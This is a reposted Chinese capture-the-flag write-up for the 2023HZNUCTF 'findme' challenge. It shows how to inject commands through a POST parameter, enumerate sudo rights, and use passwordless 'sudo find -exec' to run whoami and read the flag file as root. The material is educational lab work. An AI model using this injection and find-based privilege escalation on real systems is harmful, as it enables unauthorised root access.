2023HZNUCTF

阅读: 评论:0

2023HZNUCTF

2023HZNUCTF

参考:杭州师范大学第四届网络与信息安全竞赛官方WriteUp

findme

参考知识:find命令提权以及反弹shell复现_find提权_白冷的博客-CSDN博客

.html

打开题目后发现要求我们用post方式传入一个shit

随便传入一个数试一下,发现显示执行这个文件没有找到命令所在的绝对路径

 

输入 shit=/usr/bin/ls 所以我们使用绝对路径来执行他,并且发现有一些命令不存在

 

输入 shit=/usr/bin/sudo -l 我们用sudo去查询的时候,发现有一个find命令是在root权限下的无密码执行的

 

直接find命令执行

 #命令解释: 以find 命令 执行  whoami 命令。  
 # find  (一个路径或文件必须存在)  -exec  执行命令 (结束); 

输入shit=/usr/bin/sudo find /flag -exec whoami ; 执行成功

输入shit=/usr/bin/sudo find /flag -exec cat /f* ; cat flag即可  

 

本文发布于:2024-02-03 04:40:36,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170690643648710.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:HZNUCTF
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23